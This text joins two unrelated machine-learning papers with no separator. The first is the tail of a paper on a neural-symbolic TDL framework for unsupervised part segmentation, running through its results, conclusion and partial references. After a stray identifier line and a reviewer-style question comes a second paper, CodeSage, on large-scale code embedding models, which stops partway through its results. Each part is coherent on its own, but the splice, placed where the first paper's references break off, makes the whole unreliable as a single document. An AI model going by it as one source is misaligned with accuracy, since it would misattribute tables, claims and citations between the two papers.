Table 1: Results on unsupervised learning and symbol grounding. SP denotes the shape score. MAE and IoU for unsupervised learning are reference values for comparison with a reference AutoEncoder (AE). Ours and w/o RL are our models with and without RL tuning. We compare against DFF (Collins et al., 2018), SCOPS (SCO.) (Hung et al., 2019), and UPD (Choudhury et al., 2021).
The results are presented in the first three column groups of Table 1. We train Auto-Encoders as a reference to check whether the generated parts match the input and whether the transitional representation preserves high-dimensional information. The LineWorld and ShapeNet5 inputs are binary, so we use IoU for a more intuitive comparison. CIG is introduced in Section 3.3 and the shape score (SP) in Section 4.3. Our model significantly outperforms the baselines, with CIG of 58.0, 68.5, and 54.6 and SP of 82.6, 77.6, and 60.1 on the three datasets, respectively. Even without reinforcement learning, these advantages remain. The low reconstruction error (94.3 IoU, 1.8 MAE, and 79.8 IoU) indicates the preservation of high-dimensional information. This is because the baselines depend on concrete visual features such as edges, colors, and textures (enabled by pre-trained vision backbones) to identify the boundaries of parts, and such cues are absent in our datasets. For instance, there is no explicit color or texture difference between the strokes of a handwritten character; the character appears as one contiguous whole, so its strokes can only be distinguished with knowledge of strokes, which is learned by discovering compositional patterns. Figure 3 shows a comparison on the OmniGlot test set. See more samples in Appendix M.

5.3 ADAPT TO DOWNSTREAM TASKS

| | Bed (IoU / CIG / SP) | Lamp (IoU / CIG / SP) | Sofa (IoU / CIG / SP) | Table (IoU / CIG / SP) |
|--------|----------------------|-----------------------|-----------------------|------------------------|
| w/ PT | 67.3 / 48.1 / 52.9 | 61.1 / 42.1 / 49.1 | 62.2 / 46.8 / 45.2 | 68.3 / 50.1 / 54.6 |
| w/o PT | 18.1 / 19.0 / 13.2 | 18.3 / 19.9 / 14.6 | 21.5 / 18.9 / 19.8 | 19.9 / 22.1 / 17.9 |

Table 2: Transfer learning for our method on the ShapeGlot setup. "PT" denotes pre-training.

**Symbol Grounding.** We design two symbol grounding tasks: LW-G and OG-G. LW-G is synthesized with babyARC while preserving the shape masks (e.g., lines) and the pairwise relation annotations (e.g., perpendicular and parallel) from the engine as labels. The goal is to predict the shape masks and classify the pairwise relations. We align the predicted masks with the ground truth via the optimal-IoU assignment before computing the metrics (a sketch of this matching is given at the end of this subsection). We pre-train the models on LineWorld and add a relation prediction head on top of the baselines, while our method directly adapts the 2-ary predicate head for relation classification. OG-G is a subset of OmniGlot with the provided stroke masks as the ground truth to predict. We align predictions and ground truth as in LW-G. We pre-train the models on OmniGlot excluding the OG-G samples. We show examples of LW-G and OG-G in the Appendices. As shown in Table 1 under LW-G and OG-G, we achieve 78.4 IoU and 74.8 Acc. on LW-G and 75.9 IoU on OG-G, outperforming the baselines, whose relation prediction did not converge due to incorrect segmentations. This demonstrates that the learned transitional representation enables a smooth transfer to a concrete set of symbols, as hypothesized in Section 3.1.

**Transfer Learning.** Following ShapeGlot (Achlioptas et al., 2019), we pre-train with shapes from "chair" and four other similar categories, then transfer to 230~550 samples from the unseen categories "Bed", "Lamp", "Sofa", and "Table". We compare our method with and without pre-training. The results in Table 2 demonstrate that the learned representations are reusable and generalize effectively to unseen classes. Without pre-training, the samples for each class are not sufficient for convergence.
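The mask alignment used for LW-G and OG-G above can be implemented as bipartite matching; below is a sketch using SciPy's Hungarian solver over an IoU-based cost, which is an assumed but standard choice rather than the paper's released code.

```python
import numpy as np
from scipy.optimize import linear_sum_assignment

def align_masks(pred, gt):
    """Match predicted to ground-truth binary masks by maximizing overall IoU.

    pred: (P, H, W) predicted masks; gt: (G, H, W) ground-truth masks.
    Returns (pred_idx, gt_idx) index arrays for the optimal assignment.
    """
    p = pred.reshape(len(pred), -1).astype(np.float64)
    g = gt.reshape(len(gt), -1).astype(np.float64)
    inter = p @ g.T                                  # pairwise intersections
    union = p.sum(1)[:, None] + g.sum(1)[None, :] - inter
    iou = inter / np.maximum(union, 1e-8)
    return linear_sum_assignment(1.0 - iou)          # minimize cost = 1 - IoU
```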
### 5.4 Human Evaluation

Figure 4: Left: Results of the human evaluation. Right: The qualitative scores compared to the metrics.

**Human Interpretability.** We conduct a human evaluation of our method and the baselines. We randomly selected 500 samples from the OmniGlot test set along with the decomposition results of each method. We use the Google Vertex AI (Google, 2021) data labeling service to evaluate the results as an image annotation task with three annotators. Annotators are given decomposed samples and asked to provide one of four opinions (examples can be found in Appendix K), as outlined in an instruction that must be read before the task begins. The 2,000 samples are shuffled and then randomly assigned to the annotators. The results in Figure 4 (left) show much better interpretability for our method, while ~65% of the baseline results are not considered strokes.

**Interpretability vs. Metrics.** We further train 6 more models, in addition to the 4 models in Section 5.2, obtaining near-evenly distributed SP and CIG via early stopping. We then conduct human evaluations in the same way as above. We assign points to each sample (Non-stroke: 0, Unnatural: 1, Acceptable: 3, Good: 5) and average them as a score for each model. Comparing these scores with the metrics of each model in Figure 4 (right) shows that SP and CIG are positively correlated with human interpretability and can thus serve as reliable predictors of interpretability.

### 6 Conclusion

This paper presents the TDL framework, which uses an EM algorithm to learn a neural-symbolic transitional representation that incorporates structural information into representations. We introduce a game-theoretic diffusion model with online prototype clustering to implement TDL, and we assess it with the proposed metrics, clustering information gain and shape score. We evaluate our method on three abstract compositional visual object datasets via unsupervised learning, downstream task experiments, and human assessments. Our results demonstrate that our method largely outperforms existing unsupervised part segmentation methods, which rely on visual features instead of discovering compositionality. Furthermore, our proposed metrics agree with human judgment. We believe that our work can help bridge the gap between neural and symbolic intelligence.

7 REPRODUCIBILITY STATEMENT

To guarantee the reproducibility and completeness of this paper, we provide the full details of our model architecture and implementation in Appendix A. Appendix B contains information about the generation or preprocessing of the samples for each dataset and the split used in each experiment. Appendix C contains our settings for the hyperparameter search and our hardware platform information. The tricks we used to calculate the GT loss are included in Appendix E. We also make our code and data publicly available for readers to reproduce our work.

REFERENCES

Panos Achlioptas, Judy Fan, Robert Hawkins, Noah Goodman, and Leonidas J Guibas. Shapeglot: Learning language for shape differentiation. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 8938–8947, 2019.

Rakesh Agrawal, Tomasz Imieliński, and Arun Swami. Mining association rules between sets of items in large databases.
In Proceedings of the 1993 ACM SIGMOD international conference on Management of data, pp. 207–216, 1993. Amazon. Amazon mechanical turk. https://www.mturk.com/, 2005. Shir Amir, Yossi Gandelsman, Shai Bagon, and Tali Dekel. Deep vit features as dense visual descriptors. arXiv preprint arXiv:2112.05814, 2(3):4, 2021. Saeed Amizadeh, Hamid Palangi, Alex Polozov, Yichen Huang, and Kazuhito Koishida. Neuro-symbolic visual reasoning: Disentangling. In International Conference on Machine Learning, pp. 279–290. PMLR, 2020. Daniel Bear, Chaofei Fan, Damian Mrowca, Yunzhu Li, Seth Alter, Aran Nayebi, Jeremy Schwartz, Li F Fei-Fei, Jiajun Wu, Josh Tenenbaum, et al. Learning physical graph representations from visual scenes. Advances in Neural Information Processing Systems, 33:6027–6039, 2020. Yoshua Bengio, Aaron Courville, and Pascal Vincent. Representation learning: A review and new perspectives. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(8):1798–1828, 2013. doi: 10.1109/TPAMI.2013.50. Lukas Biewald. Experiment tracking with weights and biases, 2020. URL https://www.wandb.com/. Software available from wandb.com. Kaidi Cao, Maria Brbic, and Jure Leskovec. Concept learners for few-shot learning. In International Conference on Learning Representations, 2021. URL https://openreview.net/forum?id=eJIJF3-LoZO. Mathilde Caron, Piotr Bojanowski, Armand Joulin, and Matthijs Douze. Deep clustering for unsupervised learning of visual features. In Proceedings of the European conference on computer vision (ECCV), pp. 132–149, 2018. Angel X Chang, Thomas Funkhouser, Leonidas Guibas, Pat Hanrahan, Qixing Huang, Zimo Li, Silvio Savarese, Manolis Savva, Shuran Song, Hao Su, et al. Shapenet: An information-rich 3d model repository. arXiv preprint arXiv:1512.03012, 2015. Sihong Chen, Kai Ma, and Yefeng Zheng. Med3d: Transfer learning for 3d medical image analysis. arXiv preprint arXiv:1904.00625, 2019. Xinyun Chen, Chen Liang, Adams Wei Yu, Denny Zhou, Dawn Song, and Quoc V. Le. Neural symbolic reader: Scalable integration of distributed and symbolic representations for reading comprehension. In International Conference on Learning Representations, 2020. URL https://openreview.net/forum?id=ryxjnREFwH. Junyan Cheng, Iordanis Fostiropoulos, and Barry Boehm. Gn-transformer: Fusing sequence and graph representation for improved code summarization, 2021a.
vfzRRjumpX
About not using random token replacement, this makes a lot of sense to me. But we would probably have the same problem for natural language, if we consider multiple languages, right? Is the same practice common in training multi-lingual text embeddings?
CODE REPRESENTATION LEARNING AT SCALE

Dejiao Zhang* & Wasi Uddin Ahmad* {dejiaoz,wuahmad}@amazon.com

Ming Tan & Hantian Ding {mingtan,dhantian}@amazon.com

Ramesh Nallapati & Dan Roth & Xiaofei Ma & Bing Xiang {rnallapa,drot,xiaofeim,bxiang}@amazon.com

AWS AI Labs

ABSTRACT

Recent studies have shown that code language models at scale demonstrate significant performance gains on downstream tasks, e.g., code generation. However, most existing works on code representation learning train models at the hundred-million-parameter scale using very limited pretraining corpora. In this work, we fuel code representation learning with a vast amount of code data via a two-stage pretraining scheme. We first train the encoders via a mix of objectives that leverages both the randomness of masked language modeling and the implicit structural and semantic aspects of programming languages. We then enhance the representations via contrastive learning with hard negatives and hard positives constructed in an unsupervised manner. We establish an off-the-shelf encoder model that persistently outperforms the existing models on a wide variety of downstream tasks. To understand the factors contributing to successful code representation learning, we conduct detailed ablations and share our findings on (i) a customized and effective token-level denoising scheme for source code; (ii) the importance of hard negatives and hard positives; (iii) how the proposed bimodal contrastive learning boosts cross-lingual semantic search performance; and (iv) how the pretraining scheme determines the way downstream task performance scales with model size.

1 INTRODUCTION

Large language models (LLMs) pretrained on a massive amount of source code have reshaped the landscape of code generation (Chen et al., 2021; Chowdhery et al., 2022; Li et al., 2023, inter alia). As an example, the recent release of a 6TB dataset (Kocetkov et al., 2022) comprising source code under permissive licenses plays a pivotal role in advancing today's code language models. Nonetheless, these large corpora are not fully utilized to develop general-purpose Programming Language (PL) embedding models. To date, most PL embedding models (Feng et al., 2020a; Guo et al., 2021; 2022, inter alia) have no more than 125M parameters and are primarily trained on a few million training examples, e.g., CodeSearchNet (Husain et al., 2019).

Despite the undeniable significance of large-scale data, it is imperative to acknowledge the vital role of pretraining objectives. The prevailing approach for pretraining a bidirectional Transformer encoder to learn representations is the optimization of a masked language modeling (MLM) objective, as proposed by Devlin et al. (2019b). The masking scheme in the standard MLM objective follows an 80-10-10 practice. However, we have noticed that this masking scheme leads to suboptimal code embedding models. Since code snippets contain both natural language (NL) statements (i.e., docstrings, comments) and pure code, replacing masked tokens with a random token following the 80-10-10 convention can replace an NL token with a PL token, and vice versa (see statistics in Appendix A.3). We speculate that this co-occurrence of PL and NL, together with the syntactic nature of source code, makes it easier to disrupt both the semantics and the structure of the masked code, resulting in suboptimal learning of the language model.

*Corresponding authors with equal contribution.
1 Code and models can be found at https://code-representation-learning.github.io/

2 Under this scheme, 80% of the randomly selected tokens for prediction are replaced with the [MASK] token, 10% are substituted with random tokens, and the remaining tokens are left unchanged.

While MLM pretraining yields contextual token representations, most downstream discriminative tasks primarily function at the sequence level. When the objective is to enhance the discriminative power of representations for immediate use in sequence-level tasks, contrastive learning (CL) emerges as the go-to approach. Existing works have employed unimodal CL (using Code-Code pairs) (Guo et al., 2022; Jain et al., 2021) or bimodal CL (using Text-Code pairs) (Li et al., 2022) for representation learning. In unimodal CL, a popular choice is to utilize dropout augmentation (Gao et al., 2021) to construct positive code pairs. However, we found that dropout augmentation struggles to support a long training process, as also reported by Zhou et al. (2022). In contrast, bimodal CL is an appealing choice, primarily because of the availability of naturally occurring pairs. Prior studies utilize functions and their corresponding docstrings to establish the bimodal training pairs. Nonetheless, our preliminary experiments indicate that the substantial overlap between docstrings and function signatures makes the contrastive learning task too easy (see statistics in Appendix A.6).

To this end, we present CODESAGE, a bidirectional encoder representation model for source code. We pretrain CODESAGE using a two-stage training scheme on a large amount of customized pretraining data (Kocetkov et al., 2022). We depict the key ingredients of CODESAGE in Figure 1. We first train the bidirectional encoders via a mix of two objectives that complement each other: identifier deobfuscation (DOBF) and MLM without the 80-10-10 practice. As for a human programmer, finding meaningful names for obfuscated identifiers requires the model to acquire a profound comprehension of code semantics and structure. Meanwhile, as a more general objective, MLM covers facets of code beyond identifiers – this is important for enriching the training signal, especially for data examples with non-informative identifier names.

In the second stage, we leverage (text, code) pairs for bimodal contrastive learning (CL). In contrast to existing approaches that primarily rely on naturally occurring text and code pairs, we propose a strategy that reduces the likelihood of the model learning shortcuts. Our approach involves exclusively utilizing the function body while disregarding the signature and return statements. We additionally harness CL based on hard negatives identified within the embedding space. We show that such a hard positive and hard negative construction strategy is simple, yet essential for effective bimodal contrastive learning.

We train three bidirectional encoder representation models: CODESAGE-SMALL (130M), CODESAGE-BASE (356M), and CODESAGE-LARGE (1.3B). We assess the effectiveness of our approach on a wide variety of discriminative tasks, where CODESAGE substantially outperforms the previous state-of-the-art models of similar size on most tasks. To understand the factors contributing to successful code representation learning, we meticulously analyze the key components of our framework and present our findings for future research endeavors.
2 RELATED WORKS

Embedding for Programming Languages  Recently, there has been a surge of interest in learning general-purpose representations to support a wide variety of downstream tasks in programming languages. Feng et al. (2020a); Kanade et al. (2020); Li et al. (2023) take inspiration from the success in text and optimize a Masked Language Modeling (MLM) objective on linearized code data. Similar to text, they additionally optimize with the replaced token detection objective (Clark et al., 2020) or the next sentence prediction objective (Devlin et al., 2019b) for source code. Another line of work leverages the structural aspect of code to provide additional training signals. Among them, Guo et al. (2021) leverage the data flow to encode the "where-the-value-comes-from" relation between variables. Wang et al. (2021a); Jiang et al. (2021) inject syntactic structure from the abstract syntax tree (AST) through various auxiliary objectives. A more recent work by Guo et al. (2022) flattens the AST structure directly into a sequence and encodes the syntax information via language modeling objectives. Wang et al. (2021b); Lachaux et al. (2021) train a sequence-to-sequence language model to reconstruct the original code from identifier-obfuscated code where class, function, and variable names are replaced with special tokens. Deobfuscation implicitly encodes data flow and the AST without involving auxiliary objectives or complex inputs with deep hierarchy, since the model needs to understand the dependencies between variables as well as the code structure in order to correctly predict the names of identifiers.

Contrastive Learning  Ever since the early success attained by the Siamese network (Hadsell et al., 2006), contrastive learning has been widely adopted in representation learning with deep neural networks. Song et al. (2016) extend the vanilla triplet loss by contrasting each positive example against all in-batch negatives, which greatly improves learning efficiency and is further popularized by SimCLR (Chen et al., 2020). However, different from the computer vision domain, where effective positives can be obtained by stochastic transformations of images in the input space, effective data augmentation has long been a challenge in NLP due to the discrete nature of the input. This challenge is further validated in Gao et al. (2021), which shows that dropout (Srivastava et al., 2014) as the minimal data augmentation is often more effective than augmentations obtained by operating in the discrete input space, e.g., word deletion and replacement. Alternatively, various methods have been proposed to leverage naturally occurring pairs as positives. Zhou et al. (2022) treat consecutive utterances from dialogue data as positives, while Neelakantan et al. (2022) consider neighboring texts mined from the internet. A very recent work (Wang et al., 2022) leverages question-answer or comment pairs from StackExchange and Reddit. In a similar vein for programming languages, Guo et al. (2022); Wang et al. (2021a); Neelakantan et al. (2022) leverage (text, code) pairs with text mined from docstrings. We take a step further by focusing on hard positive and hard negative construction, which is a key ingredient for representation learning and allows us to attain off-the-shelf embedding models.
3 Method

3.1 Masked Language Modeling and Deobfuscation Pre-training

Given an input sequence with $N$ tokens, i.e., $\mathbf{x} = [x_1, x_2, \ldots, x_N]$, the masked language modeling objective (Devlin et al., 2019b) is formed as follows:

$$L_{MLM}(\mathbf{x}) = -\sum_{i \in M} \log P(x_i \mid \mathbf{x}^M)$$ (1)

Here $M$ denotes the mask applied to the given input $\mathbf{x}$. Equation (1) is essentially a denoising objective, with the task of predicting the original tokens given the masked sequence $\mathbf{x}^M$.

Deobfuscation  We first consider identifier deobfuscation (DOBF), which pretrains the model to predict the masked-out names of identifiers. As with a human programmer, in order to deobfuscate the code, the model needs to understand both the semantics and the structure of the code. The NL tokens, i.e., docstrings and comments, are excluded from code obfuscation. When the model is trained to predict identifier names, it can benefit from looking at and correlating with the NL tokens in comments or docstrings, as those often carry rich code semantics. Consequently, the model is encouraged to learn improved shared representations between PL and NL, as indicated by the better NL2Code search performance attained by DOBF compared to random masking in Table 3.

DOBF was initially proposed for Seq2Seq models (Lachaux et al., 2021; Wang et al., 2021b). To the best of our knowledge, we are the first to apply it to encoder-only models. The main challenge in adopting DOBF for encoder-only models is constructing the one-to-one mapping between mask tokens (inputs to the LM) and identifier tokens (output labels), due to the differences between code tokenization (i.e., using tree-sitter) and model-specific tokenization (i.e., using a sentencepiece tokenizer). We briefly discuss this challenge in Appendix A.5.

Random Masking  We additionally employ the random token masking strategy of BERT (Devlin et al., 2019b), for two main reasons. First, to promote better representations by encouraging the model to learn beyond identifiers: taking Python as an example, approximately 30% of code tokens are associated with identifiers, so better representations can be attained by also encoding the information carried by the remaining 70% of tokens. Second, not every programmer follows naming conventions; e.g., meaningless variable names like `v1`, `v2`, `v3` may be used. Predicting such tokens is unnecessarily hard and provides a very limited training signal.

We do not follow the 80-10-10 masking convention proposed in the standard MLM for text (Devlin et al., 2019b). Since source code is composed of NL and PL tokens (i.e., identifiers, keywords, operators), random replacement of tokens can hurt both the structure and the meaning of code and lead to deterioration in representation learning. We show in Section 4.2.1 that the 80-10-10 convention consistently results in worse performance on downstream tasks. We set the random masking rate to 15%, which we find optimal through the ablation study in Appendix A.4. For each training example, we randomly pick DOBF or random masking with equal probability.
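A minimal sketch of the resulting corruption procedure is given below. The [MASK] token id, the identifier-position extraction (a placeholder for the tree-sitter-based mapping discussed above), and the label convention are illustrative assumptions, not the paper's implementation.

```python
import random
import torch

MASK_ID = 4  # assumed id of the [MASK] token

def corrupt(tokens, identifier_positions, mask_rate=0.15):
    """Pick DOBF or random masking with equal probability; always apply
    'Full Mask' (no 80-10-10 random-token replacement)."""
    tokens = tokens.clone()
    if random.random() < 0.5 and identifier_positions:
        positions = identifier_positions                  # DOBF: mask identifiers
    else:
        n = max(1, int(mask_rate * len(tokens)))          # 15% random masking
        positions = random.sample(range(len(tokens)), n)
    labels = torch.full_like(tokens, -100)                # ignore unmasked tokens
    for p in positions:
        labels[p] = tokens[p]
        tokens[p] = MASK_ID                               # replace with [MASK] only
    return tokens, labels
```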
3.2 BIMODAL CONTRASTIVE LEARNING WITH HARD NEGATIVE AND HARD POSITIVE

Let $x_i, x_{i+}$ denote a positive input pair and $h_i, h_{i+}$ be the associated representations output by the last hidden layer of the encoder. Let $B = \{h_1, h_{1+}, h_2, h_{2+}, \ldots, h_N, h_{N+}\}$ denote the representations of a randomly sampled batch with $N$ pairs. We then minimize the following symmetric loss:

$$L_{CL}(h_i, h_{i+}) = -\left( \log \frac{\exp(h_i \odot h_{i+}/\tau)}{\exp(h_i \odot h_{i+}/\tau) + \sum_{k \in B \setminus (i,i+)} \gamma_k^i \cdot \exp(h_i \odot h_k/\tau)} + \log \frac{\exp(h_{i+} \odot h_i/\tau)}{\exp(h_{i+} \odot h_i/\tau) + \sum_{k \in B \setminus (i,i+)} \gamma_k^{i+} \cdot \exp(h_{i+} \odot h_k/\tau)} \right)$$ (2)

Here, $\tau$ is the temperature hyper-parameter, which we set to 0.05 in this work. $\odot$ denotes the cosine similarity between two representation vectors, and $\gamma_k^i$ is a weight parameter, which we detail next.

Hard Negative  Without supervision, it is tricky to identify hard negatives. We resort to a distance-based unsupervised approximation of hard negatives proposed in Zhang et al. (2021). For a given anchor $h_i$, hard negatives are those semantically different examples that are mapped close to $h_i$ in the representation space. Thereby, the closer a negative is to the anchor $h_i$ in the representation space, the larger the desired $\gamma$ value, which can be characterized as follows:

$$\gamma_k^i = \frac{\exp(h_i \odot h_k/\tau)}{\exp(h_i \odot h_k/\tau) + \sum_{j \in B \setminus (i,i+,k)} \exp(h_i \odot h_j/\tau)}$$ (3)

That is, $\gamma_k^i$ approximates the relative importance of $h_k$ to the anchor $h_i$ among all $2N-2$ in-batch negatives. Although ground-truth semantic equivalence between training examples (beyond the given positive pairs) is not available in our case, the above approximation of hard negatives remains valid, since each training batch is randomly sampled with a size much smaller than that of the whole training data; hence the presence of false negatives within each batch is negligible when the training data is large and diverse enough. We set the batch size to 8K in this paper, under which we observe monotonically increasing performance on the downstream tasks.

Hard Positive  We consider naturally occurring (text, function) pairs as positives, where the text is mined from the function docstring (Husain et al., 2019). The extracted text often summarizes the high-level semantics of the code. Contrastive learning with such bimodal data therefore largely boosts NL2Code semantic search performance in Section 4.2.2. Further, the extracted text of semantically equivalent code, whether from the same or different programming languages, is often less diverse than the code itself. Thereby, semantically similar code can be implicitly grouped together through the same or very similar summary text. Our conjecture is validated by the large performance gains on both in-language and cross-language Code2Code search in Section 4.2.2. It is also easy to see that function names and input variable names often share a significant similarity, especially in terms of lexical overlap, with the summary text (see Appendix A.6 for statistics). We thereby form hard positives by removing both the function signature and return statements: removal of the function signature reduces the chance of learning shortcuts due to its similarity with the summary text, and we remove the return statements to make the code look like a generic code snippet. We assess the effectiveness of this hard positive construction strategy in Section 4.2.2.

---

For example, masking a couple of tokens randomly from `tokenizer.convert_ids_to_tokens` can yield `tokenizer.convert_ids_to<mask><mask>`, but random token replacement can result in `tokenizer.convert_jet_toboattokens`. Consequently, the code semantics are largely altered, and representation learning via the self-attention mechanism can thereby deteriorate. See Appendix A.3 for more.
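For illustration, a PyTorch sketch of one direction of the symmetric objective in Equations (2) and (3) follows. The (anchors, positives) batch layout and the function name are assumptions for the sketch, not the paper's released code.

```python
import torch
import torch.nn.functional as F

def weighted_info_nce(h, h_pos, tau=0.05):
    """One direction of Eq. (2): anchors h vs. positives h_pos, shape (N, d).

    Every non-positive in-batch sample is a negative, reweighted by the
    soft importance gamma of Eq. (3)."""
    h = F.normalize(h, dim=-1)
    h_pos = F.normalize(h_pos, dim=-1)
    all_reps = torch.cat([h, h_pos], dim=0)        # batch B, shape (2N, d)
    sim = h @ all_reps.T / tau                     # cosine similarity / tau
    n = h.size(0)
    idx = torch.arange(n)
    pos_sim = sim[idx, idx + n]                    # similarity to the positive

    neg_mask = torch.ones_like(sim, dtype=torch.bool)
    neg_mask[idx, idx] = False                     # exclude the anchor itself
    neg_mask[idx, idx + n] = False                 # exclude the positive
    neg = sim.masked_fill(~neg_mask, float('-inf'))

    gamma = F.softmax(neg, dim=-1)                 # Eq. (3): soft hard-negative weight
    weighted_neg = (gamma * neg.exp()).sum(-1)     # exp(-inf) = 0 at masked entries
    return -(pos_sim.exp() / (pos_sim.exp() + weighted_neg)).log().mean()
```

Averaging this term with its mirror (swapping `h` and `h_pos`) gives the symmetric loss of Equation (2).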
4 EXPERIMENTS

Training Data and Model Architecture  We train our models on The Stack dataset (Kocetkov et al., 2022) over nine languages: Python, Java, JavaScript, TypeScript, C#, C, Ruby, Go, and PHP. As aforementioned, we train three embedding models with 130M (CODESAGE-SMALL), 356M (CODESAGE-BASE), and 1.3B (CODESAGE-LARGE) parameters. Please refer to Appendix A for the training details of each stage and the model hyper-parameters.

Evaluation Protocol  We assess the performance of our models on two main categories of downstream tasks: semantic search and classification. Our goal is to evaluate the encoder models in the practical scenarios where supervised fine-tuning data collection is costly. We thereby focus on zero-shot semantic search and, for classification tasks, on finetuning only a linear classification layer on top of the frozen encoders (Peters et al., 2019; Chen et al., 2020; Wang et al., 2022). We report the fully finetuned classification results and finetuning hyper-parameters in Appendix B.3.

Baselines  We compare our models against four general-purpose code representation learning encoders and OpenAI-Embedding-Ada-002. (For convenience, we refer to the latter as OpenAI-Ada-002. For a comparative analysis with OpenAI-CPT-Code-001 and OpenAI-Text-Embedding-3, please see Tables 8 & 9 in the Appendix, where OpenAI-Ada-002 attains significantly better or on-par performance against the previous and latest models, respectively.) Both CodeBERT (Feng et al., 2020a) and GraphCodeBERT (Guo et al., 2021) are trained with standard MLM on six programming languages using CodeSearchNet (Husain et al., 2019), with the replaced token detection objective (Clark et al., 2020) and the data flow prediction objective adopted as auxiliary objectives, respectively. UnixCoder (Guo et al., 2022) is trained via three language modeling and two contrastive learning objectives using the same dataset. More recently, StarEncoder (Li et al., 2023) is trained with MLM and next sentence prediction (Devlin et al., 2019b) on 86 programming languages from The Stack (Kocetkov et al., 2022). We provide more details on each baseline model in Table 6 in the Appendix. We also consider decoder-only baselines in Tables 8 & 9 in Appendix B.

4.1 COMPARISON WITH THE BASELINES

We first compare CODESAGE against the aforementioned baselines on the following tasks.

**Code2Code** semantic search is the task of retrieving relevant code fragments given a code fragment as a query. In this work, we extend the Code2Code search evaluation set (Guo et al., 2022) created from CodeNet to six more languages: C, C#, JavaScript, TypeScript, Go, and PHP; we summarize the details in Appendix B.2. We report the in-language Code2Code search results, where query and candidate codes are in the same language, in Table 1.

**NL2Code** semantic search is the task of using natural language as the query to retrieve relevant code. We consider three benchmarks in Table 2: CoSQA (Huang et al., 2021), AdvTest (Lu et al., 2021), and CSN (Guo et al., 2021). Detailed data statistics can be found in Appendix B.2.
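Since all search evaluations are zero-shot, retrieval reduces to cosine-similarity ranking of frozen-encoder embeddings. A sketch of the MRR computation, assuming a single relevant candidate per query as in the NL2Code benchmarks, follows.

```python
import torch
import torch.nn.functional as F

def mean_reciprocal_rank(query_emb, cand_emb, gold_idx):
    """MRR for zero-shot semantic search.

    query_emb: (Q, d) query embeddings; cand_emb: (C, d) candidate embeddings;
    gold_idx:  (Q,) index of the single relevant candidate per query.
    """
    q = F.normalize(query_emb, dim=-1)
    c = F.normalize(cand_emb, dim=-1)
    sim = q @ c.T                                          # cosine similarity
    gold_sim = sim[torch.arange(len(gold_idx)), gold_idx]
    rank = (sim > gold_sim.unsqueeze(1)).sum(dim=1) + 1    # 1-based rank of gold
    return (1.0 / rank.float()).mean().item()
```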
**Classification**  We consider three source code classification tasks. Code Defect detection is a benchmark in C from CodeXGLUE (Lu et al., 2021), with a binary label indicating whether a code is insecure and may put software systems at risk of attack. Code Complexity prediction (Jeon et al., 2023) is a Java benchmark that requires predicting the algorithmic complexity among 7 labels. The RunTime error prediction (Bieber et al., 2023) benchmark has 29 possible labels with a highly imbalanced distribution (see Table 10 in the Appendix). For a more robust evaluation, we balance the dataset by aligning the total number of training examples of the "no_error" class with the cumulative count of the other 28 classes.

| Model | Python | Java | JS | TS | C# | C | Ruby | PHP | GO | Avg |
|---------------|--------|-------|-------|-------|------|-------|------|------|------|------|
| CodeBERT | 14.40 | 7.62 | 5.47 | 6.05 | 3.66 | 5.53 | 13.55| 10.28| 6.27 | 8.09 |
| GraphCodeBERT | 19.23 | 10.78 | 7.38 | 8.65 | 5.54 | 8.48 | 19.69| 15.67| 9.65 | 11.68|
| StarEncoder | 19.17 | 11.65 | 9.0 | 10.52 | 5.69 | 9.72 | 21.57| 16.98| 10.81| 12.79|
| UnixCoder | 30.77 | 16.45 | 21.32 | 21.95 | 6.19 | 15.62 | 32.33| 31.93| 13.94| 21.17|
| OpenAI-Ada-002| 35.91 | 25.13 | 19.01 | 21.86 | 10.17| 29.15 | 40.85| 40.47| 23.43| 27.33|
| CODESAGE-SMALL| 36.31 | 23.97 | 26.60 | 29.90 | 11.84| 22.84 | 29.06| 34.64| 19.56| 26.08|
| CODESAGE-BASE | 47.52 | 22.84 | 28.70 | 31.95 | 13.37| 30.99 | 44.86| 51.13| 25.15| 32.95|
| CODESAGE-LARGE| 46.70 | 33.13 | 37.16 | 41.18 | 16.81| 32.89 | 54.12| 52.13| 32.48| 38.51|

Table 1: MAP score (%) of the zero-shot Code2Code search task. The language names in the top row indicate the language the queries and candidates are written in.

| Model | CoSQA | AdvTest | CSN | Defect | Complexity | Runtime |
|---------------|--------|---------|-------|--------|------------|---------|
| CodeBERT | 0.24 | 0.06 | 0.10 | 51.82<sub>0.38</sub> | 35.60<sub>1.96</sub> | 6.2<sub>0.02</sub> |
| GraphCodeBERT | 16.20 | 5.58 | 11.26 | 55.26<sub>0.28</sub> | 55.54<sub>1.98</sub> | 10.63<sub>0.10</sub> |
| StarEncoder | 10.78 | 0.93 | 2.69 | 53.2<sub>0.11</sub> | 50.63<sub>3.33</sub> | 8.91<sub>0.05</sub> |
| UnixCoder | 42.11 | 27.32 | 46.39 | 60.28<sub>0.04</sub> | 76.45<sub>1.10</sub> | 20.87<sub>0.43</sub> |
| OpenAI-Ada-002| 44.23 | 38.08 | 71.24 | 62.56<sub>0.11</sub> | 79.82<sub>0.50</sub> | 20.84<sub>0.36</sub> |
| CODESAGE-SMALL| 49.92 | 41.28 | 63.86 | 57.52<sub>0.21</sub> | 79.76<sub>0.50</sub> | 25.05<sub>1.04</sub> |
| CODESAGE-BASE | 48.50 | 49.08 | 68.72 | 57.74<sub>0.09</sub> | 85.32<sub>1.72</sub> | 24.70<sub>0.40</sub> |
| CODESAGE-LARGE| 47.53 | 52.67 | 71.24 | 58.95<sub>0.13</sub> | 90.32<sub>1.10</sub> | 24.42<sub>0.28</sub> |

Table 2: Left. MRR score (%) of NL2Code search in the zero-shot setting. For CSN, we report the average performance over six languages (see Table 7 in the Appendix for detailed results). Right. F1 (macro) score on the source code classification tasks attained by finetuning only the classification head. We finetuned each model with three seeds and report the mean and standard deviation (in subscript). The fully finetuned results can be found in Appendix B.3.

**Overall Performance Summary**  On Code2Code search, Table 1 shows that CODESAGE-SMALL (130M) persistently outperforms all baseline models with known model size (i.e., excluding OpenAI-Ada-002) on every language, with a 23.19% relative (4.91% absolute) improvement in average performance compared with UnixCoder.
With the increased model size, CODESAGE-BASE and CODESAGE-LARGE outperform the best baseline model, i.e., OpenAI-Ada-002 (model size unknown), with 20.56% relative (5.62% absolute) and 40.91% relative (11.18% absolute) improvements in average performance, respectively.

